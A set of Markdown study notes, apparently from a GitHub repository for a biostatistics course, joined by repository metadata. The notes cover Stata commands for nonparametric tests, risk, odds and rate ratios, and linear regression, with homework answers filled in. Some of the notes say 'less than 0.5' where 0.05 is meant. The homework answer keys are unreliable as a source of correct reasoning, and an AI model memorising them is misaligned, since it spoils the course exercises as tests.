Plot:\n\n```stata\n\ttwoway (connected healthpercapita hospitalbeds if country==\"United States\") if year > 1994\n```\n\n####4. Based on the scatter plots in question 1 (and without doing any further calculations), would you expect the Spearman and Pearson correlations for health expenditures per capita and year from 1995-2010 in the United States to be similar?####\n* => **Yes**\n* No\n\n####5. Calculate the Spearman correlation for health expenditures per capita and year from 1995-2010 in the United States and compare to question 2.####\n> **1.0000**\n\n```stata\n\tspearman healthpercapita year if country == \"United States\" & year > 1994\n```\n\n> **Results:** \n> Number of obs = 16 \n> Spearman's rho = 1.0000 \n> Test of Ho: healthpercapita and year are independent \n> Prob > |t| = 0.0000\n\n\n####6. 
True or False: Using the answer from question 5, we can conclude that health expenditures per capita have increased every year since 1995.####\n* => **True**\n* False\n\n\n####7. These data are ecological. How does this play a role in the interpretation of the data? (Please discuss on the discussion boards.)####\n\n\n####8. Examine trends in health per capita, number of hospital beds, and time in the other countries in this dataset. (Please discuss on the discussion boards.)####\n\n\n\n\n> Source: Created from: World Bank, World Development Indicators and Global Development Finance. \n> \n> Hospital Beds: Data after 2005 are extracted from the World Health Statistics Table 6 published by WHO. WHS data is based on PAHO basic indicators 2011. Washington, DC, Pan American Health Organization, 2011 (www.paho.org/English/SHA/coredata/tabulator/newTabulator.htm); European health for all database (HFA-DB). Copenhagen, WHO Regional Office for Europe, 2011 (http://data.euro.who.int/hfadb); Western Pacific Country Health Information Profiles 2011 Revision. Manila, WHO Regional Office for the Western Pacific, 2010 (www.wpro.who.int/countries/countries.htm); Demographic, social and health indicators for countries of the Eastern Mediterranean. Cairo, WHO Regional Office for the Eastern Mediterranean, 2011; additional data compiled as of January 2011 by the WHO Regional Office for Africa and the WHO Regional Office for South-East Asia. Some data are supplemented by country data. \n> \n> Health per Capita: World Health Organization National Health Account database (see http://apps.who.int/nha/database for the most recent updates).\n\n## Sign test ##\n> So if we look at the signs, we've got 11 positive signs and two negative signs. 
And if we test the hypothesis, that this difference is just as likely to\nbe positive as negative --in other words, that median is 0--then we can ask the question, how often do you do a study with 13 signs and get only two negatives?\n\n```stata\n\tsigntest CF = Healthy\n```\n\n## Wilcoxon Signed Rank Test - One Sample ##\n> We look at the difference. We could do our sign test on these differences. But Wilcoxon said, no, here's what we'll do. We'll rank the differences. So here it is, we'll just rank them, ignoring the sign. \n> So look at all the ranks associated with negative numbers, and then look at the ranks associated with positive numbers, positive differences. \n> So that's the Wilcoxon signed-rank test, which is the same as --we could do it on one sample, the one I showed you here was on the two sample correlated or dependent situations.\n\n```stata\n\tsignrank placebo = drug\n```\n\n## Wilcoxon Rank Sum Test - Two Sample ##\n> Throw all samples in one list and rank them. \n> Then look at the total ranks in the one sample, look at the total ranks in\nthe other sample. If the two samples are the same size, then these two should be roughly the same. If the null hypothesis of no difference is correct. That's exactly like we did with the t. \n> With the ranks, we've got much more control about the variances.\n\n```stata\n\tranksum ment_age, by(ind)\n```\n\n### In summary, when should we use the Wilcoxon, when should we use student's t? ###\n> *Advantage:* Well, the advantage of the Wilcoxon is, we don't need to assume anything about the parent or population distribution of the variable in question. So we do not need to assume normality. \n> We do not need to assume that the population is Normal distributed for Wilcoxon to be applicable. \n> => **So Wilcoxon is more robust than student's t test.** \n> \n> *Disadvantage:* If in fact you were justified in making your normality assumption. So if in fact you could use the t, how much do you lose? 
And the answer is not that much. **When in fact you have normal data, the Wilcoxon is about 95% efficient.**\n\n\n## Tutorial: Nonparametrics for Paired Data ##\n> Are the data independent or dependent? \n> What parametric and nonparametric tests are available for this type of data? \n> What type of statistical test is most appropriate for this data and why?\n\n\n### Sign Test ###\n#### What are the null and alternative hypotheses? ####\n> For the t-test we would use mean but we are using a Nonparametrics test which is using the median. \n> H_0: Median of difference = 0 \n> H_A: Median is not equal to 0\n\n```stata\n\tuse \"CVOS.dta\"\n\tsigntest t6=t0\n```\n\n> Results:\n\n sign | observed | expected\n------------ | -------- | ---------\n positive | 8 | 5\n negative | 2 | 5\n zero | 0 | 0\n **TOTAL** | **10** | **10**\n\n```stata\nOne-sided tests: \n\tHo: median of t6 - t0 = 0 vs. \n\tHa: median of t6 - t0 > 0 \n\t\tPr(#positive >= 8) = \n\t\tBinomial(n = 10, x >= 8, p = 0.5) = 0.0547\n\n\tHo: median of t6 - t0 = 0 vs. \n\tHa: median of t6 - t0 < 0 \n\t\tPr(#negative >= 2) = \n\t\tBinomial(n = 10, x >= 2, p = 0.5) = 0.9893\n\nTwo-sided test: \n\tHo: median of t6 - t0 = 0 vs. \n\tHa: median of t6 - t0 != 0 \n\t\tPr(#positive >= 8 or #negative >= 8) = \n\t\tmin(1, 2*Binomial(n = 10, x >= 8, p = 0.5)) = 0.1094\n```\n\n> How many positiv and how many negative signs are expected under the null hypotheses. That mean, that the median of the differences is equal to 0. \n> The particularly that it is positiv is 1/2. \n> p-value= **0.1094**\n\n### Signed-Rank Test ###\n#### Suppose that instead of conducting the sign test we conduct the Wilcoxon signed-rank test. Which test has more power? Why? ####\n> Signed-Rank Test is more powerful. 
Incorporates the magnitude of the differences via the rank \n> It ranks the magnitude.\n\n## State the null and alternative hypothesis for the Wilcoxon signed-rank test ##\n> H_0: Median of difference = 0 \n> H_A: Median is not equal to 0\n\n\n```stata\n\tsignrank t6=t0\n```\n\n sign | obs | sum ranks | expected\n---------- | ------ | --------- | --------\n positive | 8 | 50 | 27.5\n negative | 2 | 5 | 27.5\n zero | 0 | 0 | 0\n **TOTAL** | **10** | **55** | **55**\n\n```stata\nunadjusted variance 96.25\nadjustment for ties 0.00\nadjustment for zeros 0.00\n ----------\nadjusted variance 96.25\n\nHo: t6 = t0\n z = 2.293\n Prob > |z| = 0.0218\n```\n\n> p-value= 0.0218 (is less than 0.5) \n> We have more power to detect the difference \n\n\n### Summary ###\n\n* Sign test\n\t* Uses the signs (+ or -) of the differences only\n\t* Not used often\n\t* For small n, use binomial distribution to calculate p-value for D (D is a binomial random variable with parameters n and p=1/2 under H_0) - D is not equal to positive signs\n* Wilcoxon Signed-Rank Test\n\t* Nonparametric analogue to the paried t-test\n\t* Incorporates the magnitude of differences via ranks\n\t* More powerful than the Sign Test and generally should be used if given a choice between the two\n\n\n## Tutorial: Nonparametrics for independent samples ##\n> In this tutorial we will use data from the Digitalis Investigation Group.\n* The DIG Trial was a randomized, double blind, multicenter trial with more than 300 centers in the US and Canada participating.\n* The purpose of the trial was to examine the safety and efficacy of Digoxin in treating patients with congestive heart failure in sinus rhythm.\n* The main paper can be found in the New England Journal of Medicine\n\n> The Wilcoxon rank-sum test was used to determine if there were any differences between groups in the number of hospitalizations \n> Examine the distribution of number of hospitalization by treatment group. Are they similar? 
Are they symmetric?\n\n\n```stata\n\tuse \"dig.dta\"\n\thist nhosp, by(trtmt)\n```\n\n> So as you can see, the distribution of the number of hospitalizations are similar between the two groups and they're also **non-normal** and they are **right-skewed**. \n> So we know we have non-normal data so we can't use a t-test because the assumptions of the **t-test** don't hold. \n> => **So we're going to use the Wilcoxon rank-sum test.**\n\n### Does the rank sum test require any assumptions? ###\n> Yes there are two assumptions:\n1. Samples must be indepenedent\n2. Distribution should have some shape. And they don't have the same shapes.\n\n### What is the null hypothesis for the rank sum test? What is the alternative? ###\n> The shape is already the same. But we can shift it right.\n\n```stata\n\tranksum nhosp, by(trtmt)\n```\n\n trtmt | obs | rank sum | expected \n------------- | -------- | ------------ | ---------\n 0 | 3403 | 11767615 | 11571902 \n 1 | 3397 | 11355786 | 11551499 \n **combined** | **6800** | **23123400** | **23123400** \n\n```stata\nunadjusted variance 6.552e+09\nadjustment for ties -3.811e+08\n ----------\nadjusted variance 6.171e+09\n\nHo: nhosp(trtmt==0) = nhosp(trtmt==1)\n z = 2.491\n Prob > |z| = 0.0127\n```\n\n> p-value=0.0127 - So it is less than 0.5 -> We reject the null hypotheses\n\n\n## Nonparametrics ##\n> Consider a clinical trial where patients are randomized to one of two treatments. We want to examine whether there is there is a difference between the two treatment groups with respect to a continuous outcome. \n> \n> We are considering conducting either a two-sample t-test or a Wilcoxon Rank Sum test to examine the differences between groups. True or false: these two tests have the same null hypotheses.\n* True\n* => **False**\n\n> Suppose we somehow know that the distribution of the outcome variable within each group is normally distributed. 
True or false: in this case, the two sample t-test and the Wilcoxon Rank Sum test have the same null hypothesis. \n* => **True**\n* False\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.3729257583618164, "alphanum_fraction": 0.49232688546180725, "avg_line_length": 52.059600830078125, "blob_id": "7bdba1bea63677ad3dced9d28b952c1a8e11d2db", "content_id": "508bc822ab5111170753d4d2b564f7aebbe99746", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 8021, "license_type": "no_license", "max_line_length": 368, "num_lines": 151, "path": "/PH207x/homework/four/Stata Risk Ratio, Odds Ratios, Rate Ratios for using BMI, Death, and CHD.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Stata Risk Ratio, Odds Ratios, Rate Ratios for using BMI, Death, and CHD\nThe following table displays categories of body mass index for the participants at the 1956 exam. (Note: 19 of the 4434 participants are excluded from this table because of missing data on bmi1)\n\n## BMI and Number of People in Each BMI Category\n> BMI Category | Range of BMI | Frequency\n> ------------- | ------------- | -------------\n> Underweight | BMI<18.5 | 57\n> Normalweight | 18.5≤BMI<25 | 1936\n> Overweight | 25≤BMI<30 | 1845\n> Obese | 30≤BMI | 577\n\nUse Stata to perform the following calculations. Hint: All of the following questions ask you to compare obese subjects to normal weight subjects. Create a new binary variable using bmi1 which equals 1 if the person is obese and 0 if the person is normal weight. Anyone who is underweight or overweight should be missing a value for the new binary variable you create.\n\n\tgen newbmi1=.\n\treplace newbmi1=1 if bmi1>=30 & bmi1 <. 
\n\treplace newbmi1=0 if bmi1>=18.5 & bmi1 <25\n\tcs death newbmi1, or\n\n\n> newbmi1 | Exposed | Unexposed | Total\n> -------------- | --------- | --------- | ------------- \n> Cases | 259 | 571 | 830\n> Noncases | 318 | 1365 | 1683\n> | | \n> Total | 577 | 1936 | 2513\n> | | \n> Risk | .4488735 | .294938 | .3302825\n> | | \n\n> | Point estimate | [95% Conf. Interval] \n> --------------- | ---------------------- | --------------------------\n> Risk difference | .1539355 | .1085524 .1993186 \n> Risk ratio | 1.521925 | 1.358417 1.705113 \n> Attr. frac. ex. | .3429373 | .2638491 .4135287 \n> Attr. frac. pop | .107013 |\n> Odds ratio | 1.947015 | 1.608816 2.35632 (Cornfield)\n> chi2(1) = 47.62 Pr>chi2 = 0.0000\n\n\n##### Q1. Calculate the 24-year Risk Ratio for death comparing obese subjects (exposed group, n=577) to normal weight subjects (non-exposed group, n=1936). #####\n*Hint1: Is the same procedure as shown in the video at 1:45-3:10*\n\n>\t=> Risk Ratio= **1.521925**\n\n\n##### Q2. Calculate the 24-year Odds Ratio for death comparing obese subjects (exposed group, n=577) to normal weight subjects (non-exposed group, n=1936). #####\n*Hint1:Is the same procedure as shown in the video at 1:45-3:10*\n\n>\t=> Odds Ratio= **1.947015**\n\n\n##### Q3. Calculate the 24-year Rate Ratio for death comparing obese subjects (exposed group, n=577) to normal weight subjects (non-exposed group, n=1936). #####\n*Hint1: Uses the same variables as Q1 and Q2 and the procedure is at 6:39-8:00 of the video.*\n\n>\t=> Rate Ratio= **1.632792**\n\n\tir death newbmi1 timedth\n\n> newbmi1 | Exposed | Unexposed | Total\n> --------------- | --------- | ---------- | ------------- \n> Death indicator | 259 | 571 | 830\n> Time [years] to | 11308.9 | 40708.74 | 52017.64\n> | | | \n> Incidence rate | .0229023 | .0140265 | .0159561\n\n> | Point estimate | [95% Conf. Interval] \n> --------------- | ---------------------- | --------------------------\n> Inc. rate diff. 
| .0088758 | .0058587 .011893 \n> Inc. rate ratio | 1.632792 | 1.404331 1.894337 (exact)\n> Attr. frac. ex. | .3875522 | .2879172 .4721108 (exact)\n> Attr. frac. pop | .120935 | \n> (midp) Pr(k>=259) = 0.0000 (exact)\n> (midp) 2*Pr(k>=259) = 0.0000 (exact)\n\n\n##### Q4. Calculate the 24-year Rate Ratio for developing coronary heart disease comparing obese subjects (exposed group) to normal weight (non-exposed group), excluding subjects with prevalent CHD at the 1956 exam. Hint: Use the if/in tab options to restrict the sample to those without prevalent CHD at the 1956 exam (prevchd1 = = 0). #####\n*Hint1: Different variables from the previous 3 questions and the procedure is shown at 8:55-10:15 of the video.*\n\n>\t=> Rate Ratio= **2.050572**\n\n\tir anychd newbmi1 timechd if (prevchd1 == 0) \n\n> newbmi1 | Exposed | Unexposed | Total\n> --------------- | --------- | ---------- | ------------- \n> Incident Hosp MI| 180 | 349 | 529\n> Time [years] to | 9387.737 | 37324.05 | 46711.79\n> | | | \n> Incidence rate | .0191739 | .0093505 | .0113248\n\n> | Point estimate | [95% Conf. Interval] \n> --------------- | ---------------------- | ---------------------------\n> Inc. rate diff. | .0098234 | .0068555 .0127913 \n> Inc. rate ratio | 2.050572 | 1.703396 2.46163 (exact)\n> Attr. frac. ex. | .5123311 | .4129373 .593765 (exact)\n> Attr. frac. pop | .1743282 |\n> (midp) Pr(k>=180) = 0.0000 (exact)\n> (midp) 2*Pr(k>=180) = 0.0000 (exact)\n\n\n\n##### Q5. Calculate the 24-year Rate Ratio for developing coronary heart disease comparing (obese or overweight) subjects (exposed group) to normal weight (non-exposed group), excluding subjects with prevalent CHD at the 1956 exam. #####\n*Hint1: Different variables from the previous 3 questions and the procedure is shown at 8:55-10:15 of the video.*\n\n>\t=> Rate Ratio= **1.736394** \n\n\tgen newbmi3=.\n\treplace newbmi3=1 if ( bmi1>=30 & bmi1 <. 
) | ( bmi1>=25 & bmi1 <30 )\n\treplace newbmi3=0 if bmi1>=18.5 & bmi1 <25\n\tir anychd newbmi3 timechd if (prevchd1 == 0) \n\n> newbmi1 | Exposed | Unexposed | Total\n> --------------- | --------- | ---------- | ------------- \n> Incident Hosp MI| 686 | 349 | 1035\n> Time [years] to | 42251.22 | 37324.05 | 79575.28\n> | | | \n> Incidence rate | .0162362 | .0093505 | .0130066\n\n> | Point estimate | [95% Conf. Interval] \n> --------------- | ---------------------- | --------------------------\n> Inc. rate diff. | .0068857 | .0053241 .0084473 \n> Inc. rate ratio | 1.736394 | 1.524219 1.980922 (exact)\n> Attr. frac. ex. | .4240938 | .3439265 .4951846 (exact)\n> Attr. frac. pop | .2810902 | \n> (midp) Pr(k>=686) = 0.0000 (exact)\n> (midp) 2*Pr(k>=686) = 0.0000 (exact)\n\n\n##### Q6. Calculate the 24-year Rate Ratio for developing coronary heart disease comparing underweight subjects (exposed group) to normal weight (non-exposed group), excluding subjects with prevalent CHD at the 1956 exam. #####\n\n>\t=> Rate Ratio= **0.5731434**\n\n\tgen newbmi2=.\n\treplace newbmi2=1 if bmi1<18.5 & bmi1 >0\n\treplace newbmi2=0 if bmi1>=18.5 & bmi1 <25\n\tir anychd newbmi2 timechd if (prevchd1 == 0) \n\n> newbmi1 | Exposed | Unexposed | Total\n> ---------------- | --------- | ---------- | ------------- \n> Incident Hosp MI | 6 | 349 | 355\n> Time [years] to | 1119.57 | 37324.05 | 38443.62\n> | | | \n> Incidence rate | .0053592 | .0093505 | .0092343\n\n> | Point estimate | [95% Conf. Interval] \n> --------------- | ---------------------- | ----------------------------\n> Inc. rate diff. | -.0039913 | -.0083903 .0004076 \n> Inc. rate ratio | .5731434 | .2089001 1.260145 (exact)\n> Prev. frac. ex. | .4268566 | -.2601451 .7910999 (exact)\n> Prev. frac. 
pop | .0124311 | \n> (midp) Pr(k<=6) = 0.0798 (exact)\n> (midp) 2*Pr(k<=6) = 0.1596 (exact)\n\n\n\n" }, { "alpha_fraction": 0.316078245639801, "alphanum_fraction": 0.4229484796524048, "avg_line_length": 47.72093200683594, "blob_id": "c320ce444c64b96bd13e44ee442054c43a7909a3", "content_id": "fd3694c42bbdc997932a3ca145653f5d0ac0108a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4192, "license_type": "no_license", "max_line_length": 105, "num_lines": 86, "path": "/PH207x/excercises/Lesson4/Measures of Association/stata-Measures_of_Association_in_Stata.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Measures of Association in Stata \n\nQ1.) Examine the association between smoking status at visit 1 (cursmoke1) and death (death)\n\n * Risk Difference\n * Risk Ratio\n * Attributable Fraction Among the Exposed\n * Attributable Fraction Among the Total Population\n * Odds Ratio\n\n=> cs death cursmoke1, or\n\n | Current smoker, exam 1 |\n | Exposed Unexposed | Total\n-----------------+------------------------+------------\n Cases | 788 762 | 1550\n Noncases | 1393 1491 | 2884\n-----------------+------------------------+------------\n Total | 2181 2253 | 4434\n Risk | .3613022 .3382157 | .3495715\n | Point estimate | [95% Conf. Interval]\n |------------------------+------------------------\n Risk difference | .0230864 | -.0049864 .0511592 \n Risk ratio | 1.06826 | .9858212 1.157592 \n Attr. frac. ex. | .0638979 | -.0143828 .1361376 \n Attr. frac. 
pop | .0324849 |\n Odds ratio | 1.106873 | .9783102 1.252331 (Cornfield)\n +-------------------------------------------------\n chi2(1) = 2.60 Pr>chi2 = 0.1070\n\n## Calculate the association between smoking status at visit 1 (cursmoke1) and the rate of death (death).\n=> ir death cursmoke1 timedth\n\n | Current smoker, exam 1 |\n | Exposed Unexposed | Total\n-----------------+------------------------+------------\n Death indicator | 788 762 | 1550\nTime [years] to | 44440.38 46675.2 | 91115.58\n-----------------+------------------------+------------\n Incidence rate | .0177316 .0163256 | .0170114\n | Point estimate | [95% Conf. Interval]\n |------------------------+------------------------\n Inc. rate diff. | .001406 | -.0002899 .003102 \n Inc. rate ratio | 1.086125 | .9819268 1.201432 (exact)\n Attr. frac. ex. | .0792955 | -.0184058 .1676598 (exact)\n Attr. frac. pop | .0403128 |\n +-------------------------------------------------\n (midp) Pr(k>=788) = 0.0520 (exact)\n (midp) 2*Pr(k>=788) = 0.1040 (exact)\n\n## Calculate the association between smoking status at visit 1 (cursmoke1) and the rate of CHD (anychd).\n=> ir anychd cursmoke1 timechd\n\n | Current smoker, exam 1 |\n | Exposed Unexposed | Total\n-----------------+------------------------+------------\nIncident Hosp MI | 617 623 | 1240\nTime [years] to | 39636.77 41288.39 | 80925.16\n-----------------+------------------------+------------\n | |\n Incidence rate | .0155664 .015089 | .0153228\n | |\n | Point estimate | [95% Conf. Interval]\n |------------------------+------------------------\n Inc. rate diff. | .0004774 | -.0012292 .002184 \n Inc. rate ratio | 1.031637 | .9214548 1.154975 (exact)\n Attr. frac. ex. | .0306665 | -.0852404 .1341806 (exact)\n Attr. frac. 
pop | .0152591 |\n +-------------------------------------------------\n (midp) Pr(k>=617) = 0.2917 (exact)\n (midp) 2*Pr(k>=617) = 0.5835 (exact)\n\n# Conclusions\n## Severak measures of disease frequency\n * risks: assume no competing risk or loss to follow-up\n * rates: person-time data accounts for dynamic population\n * odds: case-control studies\n\n## Several ways to describe association between exposure and outcome\n * difference measures\n * ratio measures\n * attributable fractions\n\n## In this study, smoking is associated with\n * a higher risk, odds and rate of death compared to non-smokers\n * a higher rate of CHD compared to non-smokers\n\n\n" }, { "alpha_fraction": 0.638624906539917, "alphanum_fraction": 0.6712105870246887, "avg_line_length": 41.3287353515625, "blob_id": "fe46d4ab0513f08405d626accb019b35c7014fbf", "content_id": "1cbf5a74539b5174b76585e273877a049b18171f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 18498, "license_type": "no_license", "max_line_length": 608, "num_lines": 435, "path": "/PH207x/excercises/Lesson10/Linear Regression.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Linear Regression #\nρ\n\n```math\n\ty= m*x + b\n```\n\n\n## Simple Linear Regression ##\n> m= slope\n\n### Correlation and slope ###\n> If X & Y are jointly normal (for each fixed X(Y) then Y(X) is normal) then\n\n```math\n\tμ_x|y= α + β*x\n```\n\n> and\n\n```math\n\tβ= ( σ_y / σ_x ) * ρ\n```\n\n> **which shows the relation between correlation and slope of regression** \n> **=> The correlation coefficient is the slope of the regression line. 
If we're looking at the standardized variates.**\n\n### Equivalence ###\n> So with normal data the following 3 hypotheses are equivalent:\n\n```math\n\tH_0: ρ=0 \n\t <=> \n\tH_0: β=0 \n\t <=> \n\tH_0: σ_y=σ_y|x\n```\n\n## Least Squares ##\n> Applet: http://illuminations.nctm.org/LessonDetail.aspx?id=L455 \n> Stata Command:\n\n```stata\n\tregress headcirc gestage\n```\n\n> Fitted (least squares) regression line: \n\n```math\n\theadcirc= 3.914 + 0.78*gestage + e\n```\n\n> where standard dev of e = 1.59\n\n## Transformations ##\n> Options for running the regression in such cases_\n\n1. Do a non-linear regression\n2. Transform the ys or the xs: i.e. look at y^p or x^p e.g. \n\ty^-2, y^-1,y^-0.5, ln(y), y^0.5, y, y^2 \n\tx^-2, x^-1,x^-0.5, ln(x), x^0.5, x, x^2\n\n* going up the ladder -> (going to the right)\n* goin down the ladder <- (going to the left)\n\n## More on Transformations ##\n> This applet will give you some experience with transformations and what happens to curve shapes. Remember, we are here because we know how to handle linear regression. So if we are faced with a non-linear relationship then if we can linearize it then use the tools we have for linear regression. \n> \n> As you learnt, we can transform the y variable or the x variable. You have that capability by pressing any one of the green arrow heads in the top left-hand corner of the plot below. Pushing the up arrow makes you climb the appropriate ladder on the right of the graph. Clicking the down arrow makes you go down the ladder. The dot on the ladder tells you where you are. You always start at x, y. \n> When you look at the plot you will see a series of points on the graph paper. You can generate a new set of points by clicking on either the \"ideal\" or \"realistic\" data buttons near the bottom. The latter button shows noisy data more like what you'd encounter in the real world. 
\n> \n> Once you have your data, the challenge is to try and choose the y or x (or both) transform to straighten out the x y relationship. Try it first with no noise and once you get the hang of it, try it with noise added. \n> \n> The green dots are the original data, the blue dots are the transformed data. The straight lines are the least squares lines through the points. \n\n> Link: https://www.edx.org/courses/HarvardX/PH207x/2012_Fall/courseware/Week_10/week10:bio10/19\n\n## Multiple Linear Regression ##\n\n```math\n\ty= α + β_1*x_1 + β_2*x_2 ... + β_q*x_q + ε\n```\n> Asume: \n\n* For fixes x_1, ..., x_q, y is **normally** distributed with mean μ_y|x_1 ...., x_q and standard deviation σ_y|x1, ...., x_q\n* μ_y|x_1, ...., x_q is linear in x_1, ...., x_q \ni.e. μ_y|x_1, ...., x_q= α + β_1*x_1 + ... + β_q*x_q\n* Homoscedasticity \ni.e. μ_y|x_1, ..., x_q is constant\n* The y's are independent\n\n> => **Minimize SUM from i=1 to n (y_i - a - b_1*x_1... -b_q*x_q)^2**\n\n```stata\n\tregress headcirc gestage weight\n```\n\n```math\n\theadcirc= 8.3 + 0.45*gestage + 0.0047*weight + e\n```\n> where standard dev of e = 1.27\n\n\n## Indicator Variables ##\n> Sometimes in the literature you'll see them called dummy variables, but why inflict that on them. \n> So for example, let's look at tomexia. \n\n* So if the mother was toxemic at delivery, then we say 1 this variable will take on the value 1. - **yes**\n* If the mother was not, then this variable will take on the value 0. **no**\n\n### Estimated regression equation ###\n\n```math\n\tŷ= 1.50 + 0.874*gestage - 1.41*tox\n```\n\n> *For toxemics:*\n```math\n\tŷ= 0.83 + 0.874*gestage\n```\n\n> *For non-toxemics:*\n```math\n\tŷ= 1.50 + 0.874*gestage\n```\n\n```stata\n\tregression headcirc gestage tox\n```\n\n#### Test with T-Test #####\n> And so here's the t-test for head circumference by toxemia. And we see that we have 79 observations who are non toxemic and 21 who are toxemic. 
And we see that the t-test is not significant.\n\n```stata\n\tttest headcirc, by(tox) unequal\n```\n\n> So all of this is very complex. How do all of these things work together? So what we can do is we can generate a variable called gestational age times toxemia.\n\n```stata\n\tgen gestox = gestage*tox\n\tregression headcirc gestage tox gestox\n```\n\n## Subset Regression ##\n> So what you're doing when you're investigating is making sure that you're measuring everything, but then, you know that all these things, everything under the sun is interrelated with each other. And so that's not what you're looking for, you're looking to see is there a parsimonious way of explaining what's going on in terms of the more important, most important variables, and this we can generically label or umbrella, if you will, as the subset regression problem. \n> \n> So you've got outcome variable here, in this case, head circumference, and then you've got a whole bunch of variables that you can use to explain this. Which ones do you use in what combinations, et cetera, that's called the subset regression problem.\n\n* **All possible models** \nIf q sizeable, 2^q huge\n\n* **Forward Selection** \n(i)Choose one Variable, (ii) push this into the model and then (iii) look at the other variables\n\n* **Backward Selection** \n(i) Fit \"all\", (ii) Drop least signicant and then (iii) go back to (i)\n\n> So there are **q** variables, then we can do all two to the q. Turns out it's two to the q model fits. Now, apart from the fact that if you've got thousands of observations and q is sizable, it's going to take you the rest of your life to do all \n\n### Collinear Problem - Multi-Collinearity ###\n> So if you have a high correlation, you might run into interpretation problems and fitting problems. That's the collinear problem. 
\n> **collinear= Variables are perfectly correlated with each other.** \n\n> Results:\n\n | No interaction term | Interaction term \n---------- | ------------------- | ------------------ \nCoeff | -1.412 | -2.815 \nStd. Err. | 0.406 | 4.985 \nT-Stat | -3.477 | -0.565 \nP-Value | 0.001 | 0.574 \nR² | 0.653 | 0.653 \nAdj. R² | 0.646 | 0.642 \n\n> **Hint:** Look at the Standard Error, T-Statistics and R-Squares. \n* Look at the standard error, there's a tenfold increase in the standard error, and that's usually a tip-off that you've got some **multi-collinearity** possibly. \n* The T statistic went from a significant to quite insignificant. By adding one term you shouldn't be seeing this big a difference, unless it's very highly related to before. \n* And look at the P value went from 0.001 to 0.574, and the R-squared didn't change. \n* The R-squares didn't change at all. They're basically the same thing. Tip-off that you've got **multi-collinearity**.\n\n## Example: Hospital Ratings ##\n> In the tutorial sequence this week, we examine predictors of hospital ratings using publicly available hospital-level survey information from https://data.medicare.gov . The dataset contains \"a list of hospital ratings for the Hospital Consumer Assessment of Healthcare Providers and Systems (HCAHPS). HCAHPS (http://www.hcahpsonline.org/home.aspx) is a national, standardized survey of hospital patients about their experiences during a recent inpatient hospital stay.\" To access this dataset online, go here (https://data.medicare.gov/dataset/Survey-of-Patients-Hospital-Experiences-HCAHPS-/rj76-22dk). \n> \n> We excluded any hospitals with missing data (complete case analysis). We aim to examine trends in hospitals, and assume that this sample is representative of hospitals in the United States. Each line in this dataset represents one hospital. The variables are continuous, representing percentages from patient respondents. 
\n> \n> Hospitals aiming to improve their ratings could use this database to find the areas that are influential for patient ratings. They could examine synergies between variables to pinpoint exactly where they should invest their improvements to provide the best patient experience. Linear regression is a tool that facilitates such analyses. \n> \n> On the boards below, discuss any advantages to using linear regression, rather than simple calculating correlations, in this application. \n> \n> (The dataset is included below, if you would like to further familiarize yourself with the data before beginning the tutorial sequence.)\n\n```stata\n\tuse \"hospitaldata.dta\"\n```\n\n## Tutorial: Simple Linear Regression ##\n> We examine predictors of hospital ratings using publicly available *hospital-level* survey information from https://data.medicare.gov .\n\n* **nursealways** - percent of patients in a hospital who said their nurse always communicated well (*explanatory*)\n* **recommendyes** - percent of patients who would always recommend the hospital (*outcome*)\n\n```stata\n\tuse \"hospitaldata.dta\"\n\ttwoway (scatter recommendyes nursealways)\n\tpwcorr recommendyes nursealways\n```\n\n | recommendyes | nursealways\n------------ | ------------- | ------------\nrecommendyes | 1.0000 | \n nursealways | 0.6580 | 1.0000 \n\n> I find that the correlation between these two variables is **p=0.66**. So it does appear that they are positively correlated.\n\n### State your model ###\n> Y_i= % patients in hospital i who would always recommend this hospital. | i=1,2,...,n \n> X_i= % patients in hospital i who say that their nurse always communicated well. 
\n> ε_i= residual error -> ε_i ~ N(0, T²) \n> y_i= α + β_1*x_i + ε_i\n> μ_y_i|x_i= E(y_i|x_i)= α + β*x | Y_i ~ N(μ_y_i|x_i, σ²)\n\n### Assumptions ###\n\n* We can assume that the **hospitals are independent** of each other, and so it seems reasonable to say that we have independent observations, or independent hospitals.\n* We need to assume that there's a **linear relationship between the outcome in covariate**. And we looked at the scatter plot and this looked pretty reasonable.\n* The next two assumptions are the ones that are a little bit hairier to try to interpret in practice:\n\t+ The first is that **Y_i|X_i ~ N** - So the outcome given the covariate is **normally distributed**.\n\t+ The next assumption we need to make is **homoskedasticity**, and this is just a very long word that means constant variance.\n\n```stata\n\tregress recommendyes nursealways\n```\n\n```\n Source | SS df MS Number of obs = 3570\n-------------+------------------------------ F( 1, 3568) = 2723.72\n Model | 144368.851 1 144368.851 Prob > F = 0.0000\n Residual | 189118.972 3568 53.0041962 R-squared = 0.4329\n-------------+------------------------------ Adj R-squared = 0.4327\n Total | 333487.823 3569 93.4401297 Root MSE = 7.2804\n\n------------------------------------------------------------------------------\nrecommendyes | Coef. Std. Err. t P>|t| [95% Conf. Interval]\n-------------+----------------------------------------------------------------\n nursealways | 1.159487 .0222169 52.19 0.000 1.115928 1.203046\n _cons | -19.21559 1.712829 -11.22 0.000 -22.57381 -15.85737\n------------------------------------------------------------------------------\n```\n\n```stata\n\tsum nursealways\n```\n\n Variable | Obs | Mean | Std. Dev. 
| Min | Max\n------------ | ----------- | ----------- | ------------- | ------ | ------\n nursealways | 3570 | 76.90028 | 5.485264 | 48 | 98\n\n\n```math\n\ty_i= -19.21559 + 1.159487*x_i + ε_i\n\tε_i ~ N(0, 7.2804²)\n```\n\n> **Important:** It is a very important aspect of linear regression that you always need to keep in mind that we can't extrapolate beyond the minimum value (here: 48).\n\n### Test that hypothesis β= 0 vs β !=0 ###\n> The next thing I want to do is I want to test the hypothesis that beta is equal to 0 versus the alternative the beta is not equal to 0. \n> H_0: β= 0 \n> H_A: β != 0 \n> \n> ^β=1.16 \n> ^σ(β)=Std. Err.= 0.02 \n> t=t-test=52.19\n\n\n> Now I know that under my null hypothesis that my t statistic follows a t distribution with **Z=n-2** degrees of freedom. And I see up here that my number of observations is **n=3,570**, so it would be **3,568 degrees** of freedom. \n> Z ~H_o t_3568 => p-value < 0.001\n\n> **Conclusion:** I would reject my null hypothesis and conclude that the percent of patients who say that a nurse always communicates well is positively correlated with a percent of patients who would always recommend\na 